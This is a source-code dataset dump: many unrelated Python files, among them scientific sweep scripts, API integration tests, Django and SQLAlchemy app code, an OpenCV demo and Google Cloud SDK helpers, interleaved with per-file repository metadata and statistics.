| 24.555556 | 87 | 0.651584 | 74 | 663 | 5.513514 | 0.364865 | 0.098039 | 0.080882 | 0.132353 | 0.306373 | 0.151961 | 0 | 0 | 0 | 0 | 0 | 0 | 0.227753 | 663 | 26 | 88 | 25.5 | 0.796875 | 0.193062 | 0 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
981c530b54b5e146141b7d1224868de41fe435cb | 2,053 | py | Python | adscores/data/fcdd_2021_table2.py | jpcbertoldo/ad-scores | b106d5844d7dc5380ee8d7ce74d60b6e59aa8717 | [
"MIT"
] | null | null | null | adscores/data/fcdd_2021_table2.py | jpcbertoldo/ad-scores | b106d5844d7dc5380ee8d7ce74d60b6e59aa8717 | [
"MIT"
] | null | null | null | adscores/data/fcdd_2021_table2.py | jpcbertoldo/ad-scores | b106d5844d7dc5380ee8d7ce74d60b6e59aa8717 | [
"MIT"
] | null | null | null | """
from liznerski_explainable_2021
Liznerski, P., Ruff, L., Vandermeulen, R.A., Franks, B.J., Kloft, M., Muller, K.R., 2021. Explainable Deep One-Class Classification, in: International Conference on Learning Representations. Presented at the International Conference on Learning Representations.
Table 3
"""
from pathlib import Path
import pandas as pd
txt_fifle = Path(__file__).parent / "fcdd_2021_table2.txt" # contains the data part of the table above
str_data = txt_fifle.read_text()
nlines_per_group = 11
# this is in the order of the lines inside each group of 11 lines
METHODS_NAMES = [
"AE-SS", "AE-L2", "Ano-GAN", "CNNFD",
"VEVAE", "SMAI", "GDR", "P-NET",
"FCDD-unsupervised", "FCDD-semi-supervised",
]
lines = str_data.strip().split("\n")
line_groups = [
lines[(i * nlines_per_group):((i + 1) * nlines_per_group)]
for i in range(len(lines) // nlines_per_group)
]
line_groups = [
{
"class": g[0].lower().replace(" ", "-"),
**{
col: float(val)
for col, val in zip(METHODS_NAMES, g[1:])
},
}
for g in line_groups
]
df = pd.DataFrame.from_records(data=line_groups).set_index("class")
def get_aess():
return df[["AE-SS"]].rename(columns={"AE-SS": "score"})
def get_ael2():
return df[["AE-L2"]].rename(columns={"AE-L2": "score"})
def get_ano_gan():
return df[["Ano-GAN"]].rename(columns={"Ano-GAN": "score"})
def get_cnnfd():
return df[["CNNFD"]].rename(columns={"CNNFD": "score"})
def get_vevae():
return df[["VEVAE"]].rename(columns={"VEVAE": "score"})
def get_smai():
return df[["SMAI"]].rename(columns={"SMAI": "score"})
def get_gdr():
return df[["GDR"]].rename(columns={"GDR": "score"})
def get_pnet():
return df[["P-NET"]].rename(columns={"P-NET": "score"})
def get_fcdd_unsupervised():
return df[["FCDD-unsupervised"]].rename(columns={"FCDD-unsupervised": "score"})
def get_fcdd_semi_supervised():
return df[["FCDD-semi-supervised"]].rename(columns={"FCDD-semi-supervised": "score"})
| 24.73494 | 261 | 0.645397 | 289 | 2,053 | 4.435986 | 0.377163 | 0.046802 | 0.077223 | 0.051482 | 0.074883 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014646 | 0.168534 | 2,053 | 82 | 262 | 25.036585 | 0.73638 | 0.198734 | 0 | 0.043478 | 0 | 0 | 0.190942 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.217391 | false | 0 | 0.043478 | 0.217391 | 0.478261 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
e24ddfd08161c451b3ca37245fce6912c97295aa | 2,295 | py | Python | run/runPN4_Showcase.py | huppd/PINTimpact | 766b2ef4d2fa9e6727965e48a3fba7b752074850 | [
"MIT"
] | null | null | null | run/runPN4_Showcase.py | huppd/PINTimpact | 766b2ef4d2fa9e6727965e48a3fba7b752074850 | [
"MIT"
] | null | null | null | run/runPN4_Showcase.py | huppd/PINTimpact | 766b2ef4d2fa9e6727965e48a3fba7b752074850 | [
"MIT"
] | null | null | null | import os
import platform_paths as pp

EXE = 'peri_navier4'

os.chdir(pp.EXE_PATH)
os.system('make ' + EXE + ' -j4')

CASE_PATH = [''] * 5

npx = 4
npy = 2
npt = 4

case_consts = ' --linSolName="GMRES" --piccard --flow=1 --domain=1 --force=1 --radius=0.1 --amp=0.1 --npx='+str(npx)+' --npy='+str(npy)+' --npt='+str(npt)+' --tolNOX=1.e-2 --tolBelos=1.e-1 --maxIter=20 --lx=4. --ly=2. --xm='+str(0.25) + ' '

# First parameter sweep; immediately overridden by the narrower sweep below.
precTypes = [0, 10]
ns = [4]
res = [10, 100, 200]
STS = [10, 100, 200]
fixTypes = [1, 2, 4, 6, 9, 10]

ns = [5]
precTypes = [0, 1, 2]
res = [200]
STS = [251]
fixTypes = [1]

for precType in precTypes:
    CASE_PATH[0] = 'precType_'+str(precType)
    if not os.path.exists(pp.DATA_PATH+CASE_PATH[0]):
        os.mkdir(pp.DATA_PATH+CASE_PATH[0])
    for n in ns:
        CASE_PATH[1] = '/n2_'+str(n)
        if not os.path.exists(pp.DATA_PATH+CASE_PATH[0]+CASE_PATH[1]):
            os.mkdir(pp.DATA_PATH+CASE_PATH[0]+CASE_PATH[1])
        for re in res:
            CASE_PATH[2] = '/re_'+str(re)
            if not os.path.exists(pp.DATA_PATH+CASE_PATH[0]+CASE_PATH[1]+CASE_PATH[2]):
                os.mkdir(pp.DATA_PATH+CASE_PATH[0]+CASE_PATH[1]+CASE_PATH[2])
            for st in STS:
                CASE_PATH[3] = '/alpha2_'+str(st)
                if not os.path.exists(pp.DATA_PATH+CASE_PATH[0]+CASE_PATH[1]+CASE_PATH[2]+CASE_PATH[3]):
                    os.mkdir(pp.DATA_PATH+CASE_PATH[0]+CASE_PATH[1]+CASE_PATH[2]+CASE_PATH[3])
                for fixType in fixTypes:
                    CASE_PATH[4] = '/fixType_'+str(fixType)
                    if not os.path.exists(pp.DATA_PATH+CASE_PATH[0]+CASE_PATH[1]+CASE_PATH[2]+CASE_PATH[3]+CASE_PATH[4]):
                        os.mkdir(pp.DATA_PATH+CASE_PATH[0]+CASE_PATH[1]+CASE_PATH[2]+CASE_PATH[3]+CASE_PATH[4])
                    os.chdir(pp.DATA_PATH+CASE_PATH[0]+CASE_PATH[1]+CASE_PATH[2]+CASE_PATH[3]+CASE_PATH[4])
                    os.system(' rm ./* -r -v ')
                    case_para = ' --precType='+str(precType)+' --nx='+str(2*2**n+1)+' --ny='+str(2**n+1)+' --nt='+str(2**(n-1)+1)+' --re='+str(re)+' --alpha2='+str(st)+' --fixType='+str(fixType)+' '
                    print(case_consts + case_para)
                    os.system(pp.exe_pre(npx*npy*npt, ' -R lustre ')+pp.EXE_PATH+EXE+case_para+case_consts)
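The script above builds each nested case directory with an `exists()`/`mkdir()` ladder, one level at a time. A minimal standalone sketch (not from the repo; the directory names below just mirror the sweep parameters) shows how `os.makedirs` with `exist_ok=True` creates the whole path in one call:

```python
import os
import tempfile

# Create the full nested case directory in one call instead of five
# exists()/mkdir() pairs. exist_ok=True makes the call idempotent.
root = tempfile.mkdtemp()
case = os.path.join(root, 'precType_0', 'n2_5', 're_200', 'alpha2_251', 'fixType_1')
os.makedirs(case, exist_ok=True)
print(os.path.isdir(case))  # True
```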

# --- tests/integration/models/test_project_contract.py (nethad/moco-wrapper) ---
from moco_wrapper.util.response import JsonResponse, ListingResponse, EmptyResponse
import string
import random
from datetime import date

from .. import IntegrationTest


class TestProjectContract(IntegrationTest):
    def get_unit(self):
        with self.recorder.use_cassette("TestProjectContract.get_unit"):
            unit = self.moco.Unit.getlist().items[0]
            return unit

    def get_customer(self):
        with self.recorder.use_cassette("TestProjectContract.get_customer"):
            customer_create = self.moco.Company.create(
                "TestProjectContract",
                company_type="customer"
            )
            return customer_create.data

    def get_user(self):
        with self.recorder.use_cassette("TestProjectContract.get_user"):
            user = self.moco.User.getlist().items[0]
            return user

    def get_other_user(self):
        unit = self.get_unit()

        with self.recorder.use_cassette("TestProjectContract.get_other_user"):
            user_create = self.moco.User.create(
                "contract",
                "user",
                "{}@mycompany.com".format(self.id_generator()),
                self.id_generator(),
                unit.id,
                active=True,
            )
            return user_create.data

    def test_getlist(self):
        user = self.get_user()
        customer = self.get_customer()

        with self.recorder.use_cassette("TestProjectContract.test_getlist"):
            project_create = self.moco.Project.create(
                "dummy project, test contract getlist",
                "EUR",
                date(2020, 1, 1),
                user.id,
                customer.id
            )

            contract_list = self.moco.ProjectContract.getlist(project_create.data.id)

            assert project_create.response.status_code == 200
            assert contract_list.response.status_code == 200

            assert isinstance(contract_list, ListingResponse)

    def test_create(self):
        user = self.get_user()
        customer = self.get_customer()
        other_user = self.get_other_user()  # created user for assigning to project

        with self.recorder.use_cassette("TestProjectContract.test_create"):
            project_create = self.moco.Project.create(
                "dummy project, test contract create",
                "EUR",
                date(2020, 1, 1),
                user.id,
                customer.id
            )

            billable = False
            active = True
            budget = 9900
            hourly_rate = 100

            contract_create = self.moco.ProjectContract.create(
                project_create.data.id,
                other_user.id,
                billable=billable,
                active=active,
                budget=budget,
                hourly_rate=hourly_rate
            )

            assert project_create.response.status_code == 200
            assert contract_create.response.status_code == 200

            assert isinstance(project_create, JsonResponse)
            assert isinstance(contract_create, JsonResponse)

            assert contract_create.data.firstname == other_user.firstname
            assert contract_create.data.lastname == other_user.lastname
            assert contract_create.data.billable == billable
            assert contract_create.data.budget == budget
            assert contract_create.data.user_id == other_user.id
            assert contract_create.data.hourly_rate == hourly_rate
            assert contract_create.data.active == active

    def test_get(self):
        user = self.get_user()
        customer = self.get_customer()
        other_user = self.get_other_user()  # created user for assigning to project

        with self.recorder.use_cassette("TestProjectContract.test_get"):
            project_create = self.moco.Project.create(
                "dummy project, test contract get",
                "EUR",
                date(2020, 1, 1),
                user.id,
                customer.id
            )

            billable = False
            active = True
            budget = 9900
            hourly_rate = 100

            contract_create = self.moco.ProjectContract.create(
                project_create.data.id,
                other_user.id,
                billable=billable,
                active=active,
                budget=budget,
                hourly_rate=hourly_rate
            )

            contract_get = self.moco.ProjectContract.get(
                project_create.data.id,
                contract_create.data.id
            )

            assert project_create.response.status_code == 200
            assert contract_create.response.status_code == 200
            assert contract_get.response.status_code == 200

            assert isinstance(project_create, JsonResponse)
            assert isinstance(contract_create, JsonResponse)
            assert isinstance(contract_get, JsonResponse)

            assert contract_get.data.firstname == other_user.firstname
            assert contract_get.data.lastname == other_user.lastname
            assert contract_get.data.billable == billable
            assert contract_get.data.budget == budget
            assert contract_get.data.user_id == other_user.id
            assert contract_get.data.hourly_rate == hourly_rate
            assert contract_get.data.active == active

    def test_update(self):
        user = self.get_user()
        customer = self.get_customer()
        other_user = self.get_other_user()  # created user for assigning to project

        with self.recorder.use_cassette("TestProjectContract.test_update"):
            project_create = self.moco.Project.create(
                "dummy project, test contract update",
                "EUR",
                date(2020, 1, 1),
                user.id,
                customer.id
            )

            billable = False
            active = True
            budget = 9900.5
            hourly_rate = 100.2

            contract_create = self.moco.ProjectContract.create(
                project_create.data.id,
                other_user.id,
                billable=True,
                budget=1,
                hourly_rate=2,
            )

            contract_update = self.moco.ProjectContract.update(
                project_create.data.id,
                contract_create.data.id,
                billable=billable,
                active=active,
                budget=budget,
                hourly_rate=hourly_rate
            )

            assert project_create.response.status_code == 200
            assert contract_create.response.status_code == 200
            assert contract_update.response.status_code == 200

            assert isinstance(project_create, JsonResponse)
            assert isinstance(contract_create, JsonResponse)
            assert isinstance(contract_update, JsonResponse)

            assert contract_update.data.firstname == other_user.firstname
            assert contract_update.data.lastname == other_user.lastname
            assert contract_update.data.billable == billable
            assert contract_update.data.budget == budget
            assert contract_update.data.user_id == other_user.id
            assert contract_update.data.hourly_rate == hourly_rate
            assert contract_update.data.active == active

    def test_delete(self):
        user = self.get_user()
        customer = self.get_customer()
        other_user = self.get_other_user()  # created user for assigning to project

        with self.recorder.use_cassette("TestProjectContract.test_delete"):
            project_create = self.moco.Project.create(
                "dummy project, test contract get",
                "EUR",
                date(2020, 1, 1),
                user.id,
                customer.id
            )

            billable = False
            active = True
            budget = 9900
            hourly_rate = 100

            contract_create = self.moco.ProjectContract.create(
                project_create.data.id,
                other_user.id,
                billable=billable,
                active=active,
                budget=budget,
                hourly_rate=hourly_rate
            )

            contract_delete = self.moco.ProjectContract.delete(
                project_create.data.id,
                contract_create.data.id
            )

            assert project_create.response.status_code == 200
            assert contract_create.response.status_code == 200
            assert contract_delete.response.status_code == 204

            assert isinstance(project_create, JsonResponse)
            assert isinstance(contract_create, JsonResponse)
            assert isinstance(contract_delete, EmptyResponse)

# --- ExperimentManagement/dummy_trainer.py (CKhan1/READ-PSB-AI-right-whale-photo-id-Kaggle, MIT) ---
import argparse
import copy
import os
from bunch import Bunch
from mock import Mock
import sys
import re

from ml_utils import id_generator, TimeSeries, LogTimeseriesObserver


def create_mock():
    return Mock()


class DummyUrlTranslator(object):
    def url_to_path(self, url):
        return url

    def path_to_url(self, path):
        return path


class DummyTrainer(object):
    def __init__(self):
        pass

    def get_url_translator(self):
        return DummyUrlTranslator()

    def transform_urls_to_paths(self, args):
        regex = re.compile('.*_url$')
        keys = copy.copy(vars(args))
        for arg in keys:
            if regex.match(arg):
                new_arg = re.sub('_url$', '_path', arg)
                setattr(args, new_arg, getattr(args, arg))
        return args
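The `transform_urls_to_paths` method rewrites an argparse namespace in place: every attribute ending in `_url` gains a `_path` twin holding the same value, so downstream code can address either name. A standalone sketch of the same logic (a free function for illustration; the `exp_dir_url`/`seed` attributes are made-up inputs, not from the repo):

```python
import argparse
import copy
import re


def transform_urls_to_paths(args):
    # For every attribute named *_url, add a *_path attribute with the same value.
    regex = re.compile('.*_url$')
    keys = copy.copy(vars(args))  # copy: we mutate args while iterating its attrs
    for arg in keys:
        if regex.match(arg):
            new_arg = re.sub('_url$', '_path', arg)
            setattr(args, new_arg, getattr(args, arg))
    return args


ns = argparse.Namespace(exp_dir_url='/data/exp', seed=1)
out = transform_urls_to_paths(ns)
print(out.exp_dir_path)  # /data/exp
```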
    def _create_timeseries_and_figures(self, channels, figures_schema, *args, **kwargs):
        ts = Bunch()
        for ts_name in channels:
            ts.__setattr__(ts_name, TimeSeries())
        for figure_title, l in figures_schema.items():
            for idx, (ts_name, line_name, mean_freq) in enumerate(l):
                observer = LogTimeseriesObserver(name=ts_name + ':' + line_name, add_freq=mean_freq)
                getattr(ts, ts_name).add_add_observer(observer)
        return ts

    def save_model(self, model, file_name):
        print('ModelPath', file_name)
        model_path = self.saver.save_train_state_new(model, file_name)
        return model_path

    def init_command_receiver(self, *args, **kwargs):
        self.command_receiver = create_mock()

    def create_bokeh_session(self):
        pass

    def start_exit_handler_thread(self, *args):
        pass

    def stop_exit_handler_thread(self):
        pass

    def create_control_parser(self, default_owner):
        parser = argparse.ArgumentParser(description='TODO', fromfile_prefix_chars='@')
        parser.add_argument('--exp-dir-url', type=str, default=None, help='TODO')
        parser.add_argument('--exp-parent-dir-url', type=str, default=None, help='TODO')
        return parser

    def main(self, *args, **kwargs):
        parser = self.create_parser()
        control_parser = self.create_control_parser(default_owner='a')
        control_args, prog_argv = control_parser.parse_known_args(sys.argv[1:])
        control_args = self.transform_urls_to_paths(control_args)
        prog_args = self.transform_urls_to_paths(parser.parse_args(prog_argv))
        print(vars(control_args))

        if control_args.exp_dir_path:
            exp_dir_path = control_args.exp_dir_path
        elif control_args.exp_parent_dir_path:
            exp_dir_path = os.path.join(control_args.exp_parent_dir_path, '{random_id}'.format(
                random_id=id_generator(5),
            ))
        else:
            raise RuntimeError('exp_dir_path is not present!')

        exp = Mock()
        self.go(exp, prog_args, exp_dir_path)

    def install_sigterm_handler(self):
        pass

    # The user has to define the go function.
    def go(self, exp, args, exp_dir_path):
        raise NotImplementedError()

    def create_timeseries_and_figures(self):
        raise NotImplementedError()

    @classmethod
    def create_parser(cls):
        parser = argparse.ArgumentParser(description='TODO', fromfile_prefix_chars='@')
        return parser

# --- app/database/tables.py (victor-iyi/heart-disease, MIT) ---
# Copyright 2021 Victor I. Afolabi
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from passlib.context import CryptContext
from sqlalchemy import Column, DateTime, Enum
from sqlalchemy import Integer, Numeric, String, Text
from app.database import Base
class Category(Enum):
    patient = 'Patient'
    practitioner = 'Medical Practitioner'


class User(Base):
    __tablename__ = 'user'

    # User ID column.
    id = Column(Integer, primary_key=True, index=True)
    email = Column(String, unique=True, index=True)
    password_hash = Column(String(64), nullable=False)
    first_name = Column(String(32), index=True)
    last_name = Column(String(32), index=True)
    category = Column(Category, index=True,
                      nullable=False,
                      default=Category.patient)

    __mapper_args__ = {
        'polymorphic_identity': 'user',
        'polymorphic_on': category,
    }

    # Password context.
    pwd_context = CryptContext(schemes=['bcrypt'], deprecated='auto')

    def __repr__(self) -> str:
        return f'User({self.email}, {self.category})'

    @staticmethod
    def hash_password(password: str) -> str:
        return User.pwd_context.hash(password)

    @staticmethod
    def verify_password(password: str, hash_password: str) -> bool:
        return User.pwd_context.verify(password, hash_password)


class Patient(User):
    # Patient info.
    age = Column(Integer)
    contact = Column(String(15), index=True)
    history = Column(Text)
    aliment = Column(Text)
    last_visit_diagnosis = Column(DateTime)
    guardian_fullname = Column(String(64))
    guardian_email = Column(String)
    guardian_phone = Column(String(15))
    occurences_of_illness = Column(Text)
    last_treatment = Column(DateTime)

    __mapper_args__ = {
        'polymorphic_identity': 'patient',
        'inherit_condition': User.category == Category.patient
    }

    def __repr__(self) -> str:
        return f'Patient({self.email})'


class Practitoner(User):
    practitioner_data = Column(String)

    __mapper_args__ = {
        'polymorphic_identity': 'practitioner',
        'inherit_condition': User.category == Category.practitioner
    }

    def __repr__(self) -> str:
        return f'Practitioner({self.email})'


class Feature(Base):
    __tablename__ = 'features'

    # Primary key.
    id = Column(Integer, primary_key=True, index=True)

    # Features.
    age = Column(Integer, nullable=False)
    sex = Column(Integer, nullable=False)
    cp = Column(Integer, nullable=False)
    trestbps = Column(Integer, nullable=False)
    chol = Column(Integer, nullable=False)
    fbs = Column(Integer, nullable=False)
    restecg = Column(Integer, nullable=False)
    thalach = Column(Integer, nullable=False)
    exang = Column(Integer, nullable=False)
    oldpeak = Column(Numeric, nullable=False)
    slope = Column(Integer, nullable=False)
    ca = Column(Integer, nullable=False)
    thal = Column(Integer, nullable=False)

    # Target.
    target = Column(Integer, nullable=True)

# --- examples/rest-api-python/src/db/notes.py (serverless-stack, MIT) ---
import time
import numpy

def getNotes():
    return {
        "id1": {
            "noteId": "id1",
            "userId": "user1",
            "content": str(numpy.array([1, 2, 3, 4])),
            "createdAt": int(time.time()),
        },
        "id2": {
            "noteId": "id2",
            "userId": "user2",
            "content": str(numpy.array([5, 6, 7, 8])),
            "createdAt": int(time.time() - 1000),
        },
    }

# --- src/news/urls.py (HammudElHammud/newspage, bzip2-1.0.6) ---
from django.contrib import admin
from django.conf.urls import url
from . import views
# urlpatterns must be a list, and Python named groups use (?P<name>...).
urlpatterns = [
    url(r'^news/(?P<pk>\d+)/$', views.news_datile, name='news_datile'),
]
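The named-group syntax matters here: Python's `re` only accepts `(?P<name>...)`; the `(?<name>...)` spelling (valid in some other regex engines) fails at compile time. A small self-contained check of the corrected pattern (the sample path `news/42/` is illustrative):

```python
import re

# The corrected pattern captures the primary key as a named group.
m = re.match(r'^news/(?P<pk>\d+)/$', 'news/42/')
print(m.group('pk'))  # 42

# The (?<name>...) spelling is rejected by Python's re module.
try:
    re.compile(r'^news/(?<pk>\d+)/$')
except re.error as exc:
    print('invalid pattern:', exc)
```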

# --- src/pyterpreter/FunctionCallable.py (kinshukk/pyterpreter, MIT) ---
from Callable import Callable
from Environment import Environment

class FunctionCallable(Callable):
    def __init__(self, declaration):
        self.declaration = declaration

    def arity(self):
        return len(self.declaration.params)

    def call(self, interpreter, arguments):
        environment = Environment(enclosing=interpreter.globals)

        # bind parameter names to passed arguments
        for param_token, arg in zip(self.declaration.params, arguments):
            environment.define(param_token.lexeme, arg)

        interpreter.executeBlock(self.declaration.body, environment)
        return None

    def __str__(self):
        return f"<Function '{self.declaration.name.lexeme}'>"

# --- drawing-shapes/drawing-rectangle.py (woosal1337/cv2, MIT) ---
import cv2
image_path = "../assets/img.png"
image = cv2.imread(image_path)
# cv2.resize takes dsize as (width, height), while image.shape is (height, width),
# so the indices must be swapped when building the target size and the points.
image = cv2.resize(image, (int(image.shape[1] * 0.5), int(image.shape[0] * 0.5)))
image_shape = image.shape
point1 = (int(image_shape[1] * 0.1), int(image_shape[0] * 0.1))
point2 = (int(image_shape[1] * 0.9), int(image_shape[0] * 0.9))
cv2.rectangle(image, point1, point2, (0, 255, 0), thickness=2)
cv2.imshow("Reading Image", image)
cv2.waitKey(0)
cv2.destroyAllWindows()

# --- src/python_op3/vision_comm/vision_tracking.py (culdo/python-op3, MIT) ---
import rospy
from geometry_msgs.msg import Point
from std_msgs.msg import String

class VisionTrack:
    def __init__(self, ns):
        self._pub_face_position = rospy.Publisher("/face_position", Point)
        self._pub_demo_mode = rospy.Publisher(ns + "/mode_command", String)

# --- new.py (7wikd/R_Pi-Surveillance, MIT) ---
array = ['Welcome', 'to', 'Turing']
# Iterate over a copy: appending to the list being iterated would loop forever.
for i in array[:]:
    array.append(i.upper())
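A quick standalone check of the copy-iteration idiom: iterating the list directly while appending never terminates, because the iterator keeps reaching the freshly appended elements; slicing bounds the loop to the original three items.

```python
array = ['Welcome', 'to', 'Turing']

# array[:] snapshots the list, so the loop runs exactly three times
# even though array grows during iteration.
for i in array[:]:
    array.append(i.upper())

print(array)  # ['Welcome', 'to', 'Turing', 'WELCOME', 'TO', 'TURING']
```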

# --- tur/migrations/0003_auto_20190319_1319.py (kopuskopecik/projem, MIT) ---
# Generated by Django 2.0 on 2019-03-19 10:19
from django.db import migrations, models

class Migration(migrations.Migration):

    dependencies = [
        ('tur', '0002_dersler_updating_date'),
    ]

    operations = [
        migrations.AddField(
            model_name='dersler',
            name='anahtar',
            field=models.CharField(default='Python Dersleri', max_length=500),
        ),
        migrations.AddField(
            model_name='dersler',
            name='descriptions',
            field=models.CharField(default='Python Dersleri', max_length=500),
        ),
        migrations.AddField(
            model_name='dersler',
            name='slug2',
            field=models.SlugField(default='python', max_length=130),
        ),
    ]

# --- Lib/site-packages/MySQLdb/release.py (pavanmaganti9/djangoapp, bzip2-1.0.6) ---
__author__ = "Inada Naoki <songofacandy@gmail.com>"
version_info = (1, 4, 2, 'final', 0)
__version__ = "1.4.2"

# --- mysite/organization/views.py (dduong711/test_project, MIT) ---
from django.views.generic.edit import CreateView
from django.views.generic.detail import DetailView
from django.urls import reverse, reverse_lazy
from django.contrib.auth.decorators import login_required
from django.utils.decorators import method_decorator
from django.shortcuts import redirect
from .models import Organization
from .forms import OrganizationCreationForm

class OrganizationCreateView(CreateView):
    model = Organization
    form_class = OrganizationCreationForm
    template_name = "organization/create.html"
    success_url = reverse_lazy("organization:detail")

    def form_valid(self, form):
        self.object = form.save(username=self.request.user.username)
        return redirect(self.get_success_url())


class OrganizationDetailView(DetailView):
    model = Organization
    template_name = "organization/detail.html"

    def get_object(self, query_set=None):
        return self.request.user.organization

    @method_decorator(login_required)
    def dispatch(self, request, *args, **kwargs):
        if self.request.user.user_type == "OR":
            return super().dispatch(request, *args, **kwargs)
        return redirect(reverse("users:detail", kwargs={"username": self.request.user.username}))

# --- tests/write-tests/test_display.py (focolab/gcamp-extractor, MIT) ---
import sys
sys.path.append('/Users/stevenban/Documents/eats_worm/eats_worm')
from Extractor import *
from Threads import *
from Curator import *
e = load_extractor(default_arguments['root'])
c = Curator(e)

# --- apollo/pipeline/pipeline/job.py (ZeyadOsama/apollo, MIT) ---
#!/usr/bin/env python
"""job.py: File containing the Job class, used as an executor for the pipeline."""

__author__ = "Zeyad Osama"


class Job:
    """
    Job class, used as an executor for the pipeline.
    """

    def __init__(self) -> None:
        super().__init__()

    def initialize(self):
        pass

    def terminate(self):
        pass

    def feed(self):
        pass

    def execute(self):
        pass
| 16.148148 | 85 | 0.587156 | 57 | 436 | 4.280702 | 0.526316 | 0.131148 | 0.135246 | 0.098361 | 0.360656 | 0.360656 | 0.360656 | 0.360656 | 0.360656 | 0.360656 | 0 | 0 | 0.305046 | 436 | 26 | 86 | 16.769231 | 0.805281 | 0.357798 | 0 | 0.333333 | 0 | 0 | 0.042471 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.416667 | false | 0.333333 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
2ccd6ca54c6dd2ea4416c6e6ab209109389b62c9 | 1,858 | py | Python | lib/googlecloudsdk/command_lib/config/virtualenv/util.py | google-cloud-sdk-unofficial/google-cloud-sdk | 2a48a04df14be46c8745050f98768e30474a1aac | [
"Apache-2.0"
] | 2 | 2019-11-10T09:17:07.000Z | 2019-12-18T13:44:08.000Z | lib/googlecloudsdk/command_lib/config/virtualenv/util.py | google-cloud-sdk-unofficial/google-cloud-sdk | 2a48a04df14be46c8745050f98768e30474a1aac | [
"Apache-2.0"
] | null | null | null | lib/googlecloudsdk/command_lib/config/virtualenv/util.py | google-cloud-sdk-unofficial/google-cloud-sdk | 2a48a04df14be46c8745050f98768e30474a1aac | [
"Apache-2.0"
] | 1 | 2020-07-25T01:40:19.000Z | 2020-07-25T01:40:19.000Z | # -*- coding: utf-8 -*- #
# Copyright 2021 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Library of methods for manipulating virtualenv setup."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
from googlecloudsdk.core.util import files
from googlecloudsdk.core.util import platforms
import six
# Python modules to install into virtual env environment
MODULES = ['crcmod', 'grpcio', 'cryptography', 'google_crc32c', 'certifi']
# Enable file name.
ENABLE_FILE = 'enabled'
def IsPy2():
"""Wrap six.PY2, needed because mocking six.PY2 breaks test lib things."""
return six.PY2
def IsWindows():
"""Wrapped because mocking directly can break test lib things."""
return platforms.OperatingSystem.IsWindows()
def VirtualEnvExists(ve_dir):
"""Returns True if Virtual Env already exists."""
return os.path.isdir(ve_dir)
def EnableFileExists(ve_dir):
"""Returns True if enable file exists."""
return os.path.exists('{}/{}'.format(ve_dir, ENABLE_FILE))
def CreateEnableFile(ve_dir):
"""Create enable file."""
files.WriteFileContents('{}/{}'.format(ve_dir, ENABLE_FILE), 'enabled')
def RmEnableFile(ve_dir):
"""Remove enable file."""
os.unlink('{}/{}'.format(ve_dir, ENABLE_FILE))
| 29.492063 | 76 | 0.745425 | 256 | 1,858 | 5.285156 | 0.550781 | 0.059128 | 0.047302 | 0.037694 | 0.120473 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009458 | 0.146394 | 1,858 | 62 | 77 | 29.967742 | 0.843632 | 0.52099 | 0 | 0 | 0 | 0 | 0.087112 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.272727 | false | 0 | 0.363636 | 0 | 0.818182 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
e2c1f25eae995daf15cfeb601d8c6e07d2c00522 | 850 | py | Python | 2015/21_rpg_test.py | pchudzik/adventofcode | e1d6521621f6ca90f9dc53cf3d1ed5b8c5c2b7d1 | [
"MIT"
] | null | null | null | 2015/21_rpg_test.py | pchudzik/adventofcode | e1d6521621f6ca90f9dc53cf3d1ed5b8c5c2b7d1 | [
"MIT"
] | null | null | null | 2015/21_rpg_test.py | pchudzik/adventofcode | e1d6521621f6ca90f9dc53cf3d1ed5b8c5c2b7d1 | [
"MIT"
] | null | null | null | import importlib
rpg_module = importlib.import_module("21_rpg")
Character = rpg_module.Character
encounter = rpg_module.encounter
simulate_battle = rpg_module.simulate_battle
def test_encounter():
player = Character(8, 5, 5)
boss = Character(12, 7, 2)
assert encounter(player, boss) is None
assert boss.hit_points == 9
assert player.hit_points == 6
assert encounter(player, boss) is None
assert boss.hit_points == 6
assert player.hit_points == 4
assert encounter(player, boss) is None
assert boss.hit_points == 3
assert player.hit_points == 2
assert encounter(player, boss) is player
assert boss.hit_points == 0
assert player.hit_points == 2
